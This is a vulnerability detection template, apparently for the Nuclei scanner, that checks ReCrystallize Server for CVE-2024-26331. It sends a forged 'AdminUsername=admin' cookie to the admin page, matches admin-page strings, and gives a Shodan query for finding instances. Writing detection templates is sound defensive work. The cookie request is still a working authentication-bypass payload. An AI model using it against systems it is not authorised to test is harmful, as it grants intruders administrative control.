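# Detection template for CVE-2024-26331: checks whether a ReCrystallize Server
# instance serves its administration page to a request that carries no session,
# only a client-supplied 'AdminUsername' cookie.
id: CVE-2024-26331

info:
  name: ReCrystallize Server - Authentication Bypass
  author: Carson Chan
  severity: high
  description: |
    This vulnerability allows an attacker to bypass authentication in the ReCrystallize Server application by manipulating the 'AdminUsername' cookie. This gives the attacker administrative access to the application's functionality, even when the default password has been changed.
  reference:
    - https://preview.sensepost.com/blog/2024/from-discovery-to-disclosure-recrystallize-server-vulnerabilities/
    - https://sensepost.com/blog/2024/from-discovery-to-disclosure-recrystallize-server-vulnerabilities/
    - https://www.recrystallize.com/merchant/ReCrystallize-Server-for-Crystal-Reports.htm
    - https://github.com/Ostorlab/KEV
  classification:
    # cve-id repeats the template id so tooling that indexes findings by
    # classification can correlate this result with the CVE.
    cve-id: CVE-2024-26331
    epss-score: 0.00053
    epss-percentile: 0.21091
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"ReCrystallize"
  tags: cve,recrystallize,auth-bypass,cve2024

http:
  - method: GET
    path:
      - "{{BaseURL}}/Admin/Admin.aspx"
    headers:
      # The cookie is the only credential sent. Per the description, the
      # application trusts this client-controlled value as the admin identity,
      # so changing the default password does not mitigate a match.
      Cookie: "AdminUsername=admin"

    # Both matchers must succeed: a login form, redirect or error page that
    # lacks the admin-page strings, or any non-200 response, is not reported.
    matchers-condition: and
    matchers:
      # All three strings are required (condition: and); they are expected to
      # appear together only on the rendered administration page.
      - type: word
        part: body
        words:
          - "ReCrystallize Server Administration"
          - "License Status:"
          - "System Info</a>"
        condition: and

      - type: status
        status:
          - 200
# Triage for a match: treat the admin interface as reachable without
# authentication. Restrict network access to the /Admin/ path, and review web
# server logs for requests to /Admin/Admin.aspx that were not preceded by a
# login (cookie values are only visible if cookie logging is enabled).
# See the references for vendor status.
#
# NOTE(review): the digest below appears to be the signature of the template
# text as published; it will not verify once any line above is edited, so
# re-sign the template before distributing a modified copy.
# digest: 4a0a00473045022100f68e3fc7dd7b10c2e71a77cc24fb7a99e1a6e4ff9d5b86e7c9b25e7f5575187f02206926e5e7531aec461b57177090c9496406e951fd6da19bdaec5812315f77730f:922c64590222798bb761d5b6d8e72950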